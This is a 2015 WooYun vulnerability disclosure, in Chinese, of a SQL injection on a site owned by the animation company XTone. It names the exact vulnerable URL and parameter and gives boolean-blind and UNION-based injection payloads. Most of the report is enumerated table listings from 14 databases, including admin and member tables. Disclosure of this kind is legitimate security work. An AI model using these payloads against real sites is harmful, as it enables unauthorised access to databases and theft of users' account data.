当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158638

漏洞标题:XTone翔通动漫旗下某站点SQL注入漏洞(14个库+5.5W账号信息)

相关厂商:XTone翔通动漫

漏洞作者: 路人甲

提交时间:2015-12-07 23:24

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

XTone翔通动漫集团成立于2003年1月,是中国大陆最早从事手机动漫的企业,是文化部、工信部动漫产业发展重点扶持企业,是中国电信运营商产品基地动漫核心合作公司,是中国动漫产业最大的手机动漫公司之一。

详细说明:

注入点:http://www.dupv.com/flash_info.php?id=3168
id参数可使用布尔型和联合查询方式进行注入,其它注入类型未测试

0.png


Payload:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3168' AND 4952=4952 AND 'ZMVD'='ZMVD
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (94) - 17 columns
    Payload: id=-2914' UNION ALL SELECT 94,94,94,94,94,CONCAT(0x71706a7171,0x6841474a77704d42747476525978736b736677786e4f44616342434c434668666e63574a4777714b,0x7176786a71),94,94,94,94,94,94,94,94,94,94,94#
    Vector:  UNION ALL SELECT 94,94,94,94,94,[QUERY],94,94,94,94,94,94,94,94,94,94,94#


1.png


其中数web_zooao数据库账号信息最多。web_zooao数据库对应站点http://www.zooao.com/,卓傲网-中国最大的动漫版权交易平台

漏洞证明:

1.png


Database: web_87873_v2_formal
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| game_type_relation                    | 6657    |
| game_basic_info                       | 6129    |
| game_expand_info                      | 6129    |
| game_media_info                       | 6129    |
| game_search_word                      | 6129    |
| game_developer                        | 932     |
| game_tag_type_relation                | 128     |
| game_tags                             | 128     |
| admin                                 | 11      |
| game_type                             | 8       |
| page_index_block                      | 6       |
| page_topic                            | 6       |
| page_topic_block                      | 6       |
| page_rank                             | 5       |
| page_recommend                        | 4       |
| page_banner                           | 2       |
+---------------------------------------+---------+
Database: web_az
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| az_linkage                            | 3284    |
| az_attachment                         | 1816    |
| az_log                                | 1799    |
| az_imgfile                            | 1209    |
| az_goods                              | 298     |
| az_menu                               | 296     |
| az_model_field                        | 101     |
| az_admin_role_priv                    | 29      |
| az_announce                           | 26      |
| az_cache                              | 26      |
| az_module                             | 22      |
| az_cartoonrate                        | 15      |
| az_position                           | 12      |
| az_urlrule                            | 8       |
| az_member_group                       | 7       |
| az_admin_role                         | 6       |
| az_brandtype                          | 5       |
| az_category                           | 5       |
| az_model                              | 5       |
| az_sso_settings                       | 5       |
| az_admin                              | 4       |
| az_apptype                            | 4       |
| az_type                               | 4       |
| az_workflow                           | 4       |
| az_member_menu                        | 3       |
| az_duanxin                            | 2       |
| az_link                               | 2       |
| az_site                               | 1       |
| az_sso_admin                          | 1       |
| az_sso_applications                   | 1       |
+---------------------------------------+---------+
Database: web_wocao
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wc_sc_name                            | 44710   |
| wc_official_article                   | 20      |
| wc_official_article_comment           | 18      |
| wc_user_basic                         | 4       |
| wc_articles_basic                     | 1       |
| wc_user_fans                          | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 8596    |
| STATISTICS                            | 1824    |
| KEY_COLUMN_USAGE                      | 910     |
| PARTITIONS                            | 898     |
| TABLES                                | 898     |
| TABLE_CONSTRAINTS                     | 821     |
| SESSION_VARIABLES                     | 434     |
| GLOBAL_VARIABLES                      | 420     |
| GLOBAL_STATUS                         | 341     |
| SESSION_STATUS                        | 341     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| PLUGINS                               | 43      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| SCHEMATA                              | 14      |
| ENGINES                               | 9       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: web_xtgame
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pm_allimformation                     | 1296    |
| pm_allimformation_20131017            | 1233    |
| pm_allimformation_bak                 | 1019    |
| pm_allimformation_new2                | 1019    |
| pm_allimformation_old2                | 1019    |
| pm_allimformation_20111123            | 881     |
| pm_allimformation_bak2                | 881     |
| pm_allimformation_old                 | 881     |
| pm_fujian                             | 694     |
| pm_fujian_bak                         | 226     |
| pm_mm                                 | 169     |
| pm_mm_bak                             | 169     |
| pm_recharge                           | 61      |
| sys_menu                              | 30      |
| pm_downs                              | 18      |
| pm_user                               | 11      |
| pm_game                               | 9       |
| pm_game_bak                           | 9       |
| pm_game_new                           | 9       |
| pm_reconsume                          | 5       |
| admin_info                            | 3       |
+---------------------------------------+---------+
Database: web_pub_material
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| t_sc_name                             | 48566   |
| t_sc_file                             | 36715   |
| t_sc_hd_log1                          | 33268   |
| news_info                             | 27678   |
| t_sc_file_bak0926                     | 16876   |
| bt_comments                           | 16593   |
| t_material_class                      | 13126   |
| t_sc_name_bak1110                     | 12021   |
| t_sc_name_bak111002                   | 12021   |
| t_sc_file_old                         | 11903   |
| t_material                            | 8238    |
| t_sc_name_bak0926                     | 6909    |
| t_sc_file_bak                         | 4973    |
| t_sc_name_bak                         | 4352    |
| za_book_info                          | 3220    |
| t_sc_name_old                         | 2557    |
| mms_send                              | 2468    |
| za_file_pic                           | 1684    |
| t_sc_xtone_rate                       | 1511    |
| za_member                             | 911     |
| t_sc_zp_piao                          | 701     |
| zt_tougao                             | 698     |
| t_sc_kindname                         | 689     |
| za_video_conn                         | 619     |
| web_log                               | 609     |
| za_xingxiang                          | 594     |
| za_video                              | 530     |
| t_sc_member                           | 514     |
| t_sc_vote                             | 488     |
| news_ding_log                         | 369     |
| bt_photo                              | 331     |
| t_weibo_selfadd                       | 316     |
| t_sc_recharge                         | 306     |
| rec_rctj                              | 293     |
| t_sc_getkind                          | 287     |
| t_kindname                            | 286     |
| za_success_case                       | 235     |
| links_info                            | 207     |
| bt_month_thing                        | 205     |
| t_kindname_tmp                        | 201     |
| vote                                  | 199     |
| za_product                            | 196     |
| za_book_chapter                       | 152     |
| za_copyright                          | 129     |
| t_sc_kindname_tmp                     | 119     |
| za_pic                                | 106     |
| mmyang                                | 103     |
| mmxiang                               | 101     |
| mmtuzi                                | 100     |
| mmzhu                                 | 100     |
| bt_year_month                         | 94      |
| tb_admin_class                        | 93      |
| za_comment                            | 88      |
| za_shenqingform                       | 75      |
| t_sc_member_comments                  | 63      |
| t_sc_typename                         | 61      |
| t_sc_catepic                          | 55      |
| t_sc_bupu_rate                        | 54      |
| za_tem_upss                           | 54      |
| creation                              | 53      |
| zt_tougao_xilie                       | 49      |
| t_sc_nomo_scores                      | 48      |
| news_category                         | 45      |
| t_sc_nomo_rate                        | 44      |
| MT_pic                                | 42      |
| za_product_category                   | 41      |
| t_sc_renqi_third                      | 40      |
| vote2                                 | 38      |
| t_sc_subject_img_element              | 30      |
| web_menu                              | 26      |
| za_video_type                         | 25      |
| t_sc_catename                         | 24      |
| za_book                               | 24      |
| web_privilege                         | 21      |
| t_sc_member_message                   | 19      |
| rec_zwname                            | 16      |
| kjava_screen                          | 15      |
| rec_plan                              | 15      |
| kjava_type                            | 14      |
| t_catename                            | 13      |
| t_sc_member_cookie                    | 13      |
| t_sc_touxian                          | 13      |
| za_focus_pic                          | 13      |
| za_links                              | 12      |
| juben_xiafa                           | 10      |
| links_website                         | 10      |
| rec_zpxc                              | 10      |
| t_sc_member_person                    | 9       |
| za_question                           | 9       |
| za_subject                            | 9       |
| t_sc_subject_img_size                 | 8       |
| tb_admin                              | 8       |
| za_book_category                      | 8       |
| za_comment_tab                        | 8       |
| t_sc_rate                             | 7       |
| keywords_set                          | 6       |
| za_question_answer                    | 6       |
| za_video_tab                          | 6       |
| rec_department                        | 5       |
| links_info_type                       | 4       |
| rec_hr                                | 4       |
| t_sc_subject_img_tab_child            | 4       |
| tb_admin_dept                         | 4       |
| web_admin                             | 4       |
| t_sc_memrank                          | 3       |
| t_sc_reconsume                        | 3       |
| za_adsense                            | 3       |
| za_subject_tab                        | 3       |
| za_task_answer                        | 3       |
| za_task_member                        | 3       |
| links_type                            | 2       |
| rec_answer                            | 2       |
| submit                                | 2       |
| t_sc_member_model                     | 2       |
| web_dept                              | 2       |
| wocai                                 | 2       |
| za_task                               | 2       |
| zt_tougao_qi                          | 2       |
| cp_company_message                    | 1       |
| news_type                             | 1       |
| t_sc_member_company                   | 1       |
| t_sc_subject_img_tab                  | 1       |
| t_weibo                               | 1       |
+---------------------------------------+---------+
Database: web_87873_v2
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| game_basic_info                       | 571     |
| game_expand_info                      | 569     |
| game_media_info                       | 569     |
| game_search_word                      | 569     |
| game_developer                        | 96      |
| game_tag_type_relation                | 26      |
| page_topic_block                      | 13      |
| page_topic                            | 9       |
| game_type                             | 8       |
| page_index_block                      | 7       |
| game_tags                             | 6       |
| page_recommend                        | 6       |
| game_type_relation                    | 5       |
| page_rank                             | 5       |
| page_banner                           | 3       |
+---------------------------------------+---------+
Database: web_wsc
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wsc_region                            | 3408    |
| wsc_stats                             | 305     |
| wsc_shop_config                       | 175     |
| wsc_admin_action                      | 109     |
| wsc_admin_log                         | 78      |
| wsc_category                          | 42      |
| wsc_goods_gallery                     | 35      |
| wsc_template                          | 22      |
| wsc_goods                             | 14      |
| wsc_mail_templates                    | 14      |
| wsc_goods_attr                        | 10      |
| wsc_sessions_data                     | 9       |
| wsc_article                           | 6       |
| wsc_reg_fields                        | 6       |
| wsc_collect_goods                     | 5       |
| wsc_order_goods                       | 5       |
| wsc_users                             | 5       |
| wsc_order_info                        | 4       |
| wsc_pay_log                           | 4       |
| wsc_article_cat                       | 3       |
| wsc_attribute                         | 3       |
| wsc_brand                             | 3       |
| wsc_friend_link                       | 3       |
| wsc_goods_type                        | 3       |
| wsc_area_region                       | 2       |
| wsc_shipping                          | 2       |
| wsc_shipping_area                     | 2       |
| wsc_user_address                      | 2       |
| wsc_admin_user                        | 1       |
| wsc_cart                              | 1       |
| wsc_payment                           | 1       |
| wsc_user_rank                         | 1       |
+---------------------------------------+---------+
Database: web_freewap
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pic_pos                               | 219685  |
| ring_pos                              | 99893   |
| ring_pos_copy                         | 99893   |
| channel_name                          | 44200   |
| c_ring_name                           | 42610   |
| pic_names                             | 13085   |
| ring_name                             | 7012    |
| kjava_pos                             | 5404    |
| video_pos                             | 3717    |
| theme_pos                             | 2822    |
| kjava_name                            | 1810    |
| theme_name                            | 1411    |
| c_theme_name                          | 1211    |
| public_class                          | 659     |
| video_name                            | 642     |
| public_subject                        | 552     |
| upload_file_log                       | 499     |
| ring_singer                           | 339     |
| ring_everyweek                        | 311     |
| c_pic_name                            | 157     |
| c_video_name                          | 125     |
| crbt_name                             | 87      |
| tb_content                            | 82      |
| tb_admin_class                        | 67      |
| theme_mbtype                          | 45      |
| MT_ring                               | 30      |
| wd_pic_dim                            | 29      |
| c_kjava_name                          | 27      |
| MT_pic                                | 20      |
| tb_cate                               | 6       |
| tb_admin                              | 5       |
| tb_admin_dept                         | 5       |
| MT_video                              | 1       |
+---------------------------------------+---------+
Database: web_flow
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ip_city                               | 434897  |
| ip_data                               | 434897  |
| log                                   | 563     |
| webflow_201407                        | 538     |
| provscitys                            | 328     |
| webflow_201410                        | 193     |
| webflow_201411                        | 180     |
| webflow_201412                        | 174     |
| webflow_201409                        | 99      |
| privilege                             | 82      |
| menu                                  | 39      |
| province                              | 31      |
| monthreport                           | 19      |
| admin                                 | 3       |
| dept                                  | 2       |
| click_log                             | 1       |
| cpinfo                                | 1       |
+---------------------------------------+---------+
Database: web_zooao
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| za_member                             | 43351   |
| news_info                             | 28931   |
| za_file_pic                           | 4123    |
| za_book_info                          | 3220    |
| za_news_collect                       | 1075    |
| news_ding_log                         | 975     |
| za_video                              | 928     |
| za_video_conn                         | 776     |
| za_xingxiang                          | 618     |
| za_success_case                       | 547     |
| za_pic                                | 293     |
| za_task_shenqing                      | 277     |
| api_actions                           | 275     |
| za_product                            | 232     |
| za_service                            | 209     |
| za_task                               | 206     |
| za_comment                            | 159     |
| za_book_chapter                       | 152     |
| za_copyright                          | 138     |
| za_service_shenqing                   | 120     |
| za_question                           | 87      |
| za_shenqingform                       | 77      |
| za_tem_upss                           | 65      |
| tb_admin_class                        | 58      |
| news_category                         | 51      |
| za_product_category                   | 41      |
| api_actionm                           | 36      |
| za_comment_tab                        | 35      |
| za_wallpaper                          | 27      |
| za_wallpaper_pics                     | 27      |
| za_book                               | 25      |
| za_video_type                         | 25      |
| news_focusimg                         | 13      |
| za_links                              | 12      |
| tb_admin                              | 10      |
| za_focus_pic                          | 10      |
| za_recharge_detail                    | 10      |
| za_task_temp                          | 9       |
| za_book_category                      | 8       |
| za_subject                            | 8       |
| za_wallpaper_cate                     | 8       |
| za_feedback                           | 7       |
| za_searchkey                          | 7       |
| za_service_kind                       | 6       |
| za_task_kind                          | 6       |
| tb_admin_dept                         | 4       |
| za_contact_info                       | 4       |
| za_member_techang                     | 4       |
| za_adsense                            | 3       |
| za_contact_kefu                       | 3       |
| za_subject_tab                        | 3       |
| za_wenda                              | 3       |
| za_wenda_type                         | 3       |
| za_face                               | 2       |
| za_task_mode                          | 1       |
+---------------------------------------+---------+
Database: web_87873
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pre_common_district                   | 45051   |
| pre_forum_post                        | 21391   |
| pre_forum_thread                      | 20759   |
| pre_forum_newthread                   | 20685   |
| pre_forum_sofa                        | 20282   |
| pre_common_credit_rule_log            | 8382    |
| pre_home_notification                 | 5802    |
| pre_common_member_newprompt           | 5027    |
| pre_ucenter_memberfields              | 4911    |
| pre_ucenter_members                   | 4911    |
| pre_common_member                     | 4899    |
| pre_common_member_count               | 4899    |
| pre_common_member_field_forum         | 4899    |
| pre_common_member_field_home          | 4899    |
| pre_common_member_profile             | 4899    |
| pre_common_member_status              | 4899    |
| pre_common_onlinetime                 | 4357    |
| pre_common_member_action_log          | 3739    |
| pre_common_statuser                   | 2007    |
| pre_forum_statlog                     | 1147    |
| pre_forum_threadpartake               | 647     |
| pre_forum_filter_post                 | 635     |
| pre_game                              | 621     |
| pre_forum_rsscache                    | 620     |
| pre_mobile_wsq_threadlist             | 505     |
| pre_common_setting                    | 425     |
| pre_forum_post_tableid                | 137     |
| pre_common_syscache                   | 110     |
| pre_common_block_style                | 104     |
| pre_common_block                      | 98      |
| pre_common_smiley                     | 85      |
| pre_common_pluginvar                  | 70      |
| pre_forum_forumfield                  | 70      |
| pre_forum_forum                       | 69      |
| pre_common_admincp_perm               | 67      |
| pre_common_block_item                 | 58      |
| pre_common_nav                        | 53      |
| pre_common_member_profile_setting     | 51      |
| pre_common_stat                       | 51      |
| pre_common_stylevar                   | 45      |
| pre_forum_threadmod                   | 40      |
| pre_common_credit_rule                | 31      |
| pre_ucenter_settings                  | 27      |
| pre_common_optimizer                  | 25      |
| pre_common_tag                        | 23      |
| pre_common_tagitem                    | 23      |
| pre_common_template_block             | 22      |
| pre_common_cron                       | 20      |
| pre_common_usergroup                  | 20      |
| pre_common_usergroup_field            | 20      |
| pre_forum_attachment                  | 18      |
| pre_common_plugin                     | 17      |
| pre_ucenter_failedlogins              | 16      |
| pre_forum_threadimage                 | 15      |
| pre_home_click                        | 15      |
| pre_game_comments                     | 13      |
| pre_ucenter_notelist                  | 13      |
| pre_forum_medal                       | 10      |
| pre_game_type                         | 10      |
| pre_home_favorite                     | 10      |
| pre_dsu_paulsignemot                  | 9       |
| pre_common_admingroup                 | 7       |
| pre_forum_modwork                     | 7       |
| pre_game_package                      | 7       |
| pre_game_package_library              | 7       |
| pre_custom_ad                         | 6       |
| pre_forum_typeoption                  | 6       |
| pre_common_admincp_group              | 5       |
| pre_common_friendlink                 | 5       |
| pre_game_banner                       | 5       |
| pre_common_block_pic                  | 4       |
| pre_dsu_paulsign                      | 4       |
| pre_forum_activity                    | 4       |
| pre_forum_attachment_0                | 4       |
| pre_forum_bbcode                      | 4       |
| pre_forum_onlinelist                  | 4       |
| pre_common_block_item_data            | 3       |
| pre_forum_attachment_2                | 3       |
| pre_forum_grouplevel                  | 3       |
| pre_forum_imagetype                   | 3       |
| pre_forum_threadcalendar              | 3       |
| pre_forum_threadhot                   | 3       |
| pre_game_service                      | 3       |
| pre_common_admincp_cmenu              | 2       |
| pre_common_admincp_member             | 2       |
| pre_common_cache                      | 2       |
| pre_common_diy_data                   | 2       |
| pre_common_word_type                  | 2       |
| pre_forum_attachment_1                | 2       |
| pre_forum_attachment_3                | 2       |
| pre_forum_attachment_4                | 2       |
| pre_forum_attachment_7                | 2       |
| pre_forum_attachment_8                | 2       |
| pre_forum_attachment_user_download    | 2       |
| pre_mobile_setting                    | 2       |
| pre_ucenter_pm_members                | 2       |
| pre_common_admincp_session            | 1       |
| pre_common_advertisement              | 1       |
| pre_common_advertisement_custom       | 1       |
| pre_common_failedip                   | 1       |
| pre_common_failedlogin                | 1       |
| pre_common_secquestion                | 1       |
| pre_common_style                      | 1       |
| pre_common_template                   | 1       |
| pre_dsu_paulsignset                   | 1       |
| pre_forum_attachment_5                | 1       |
| pre_forum_attachment_6                | 1       |
| pre_forum_attachment_9                | 1       |
| pre_forum_collection                  | 1       |
| pre_forum_collectionrelated           | 1       |
| pre_forum_collectionthread            | 1       |
| pre_forum_threadclass                 | 1       |
| pre_forum_threadprofile               | 1       |
| pre_home_friend_request               | 1       |
| pre_ucenter_admins                    | 1       |
| pre_ucenter_applications              | 1       |
| pre_ucenter_pm_indexes                | 1       |
| pre_ucenter_pm_lists                  | 1       |
| pre_ucenter_pm_messages_1             | 1       |
+---------------------------------------+---------+
Database: web_workcms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wk_log                                | 2554    |
| wk_tasklog                            | 395     |
| wk_task                               | 161     |
| wk_work                               | 45      |
| wk_menu                               | 36      |
| wk_privilege                          | 28      |
| wk_pro                                | 11      |
| wk_workstatus                         | 5       |
| wk_admin                              | 3       |
| wk_dept                               | 3       |
+---------------------------------------+---------+
Database: web_piaoliu
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pl_log                                | 944     |
| pl_game                               | 50      |
| pl_menu                               | 30      |
| pl_privilege                          | 19      |
| pl_news                               | 13      |
| pl_gametype                           | 6       |
| pl_shouyoutuijian                     | 6       |
| pl_newstype                           | 4       |
| pl_wenda                              | 4       |
| pl_admin                              | 2       |
| pl_appkind                            | 2       |
| pl_dept                               | 2       |
| pl_shouyoutype                        | 2       |
+---------------------------------------+---------+

修复方案:

过滤 && 数据库账号权限合理赋权

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝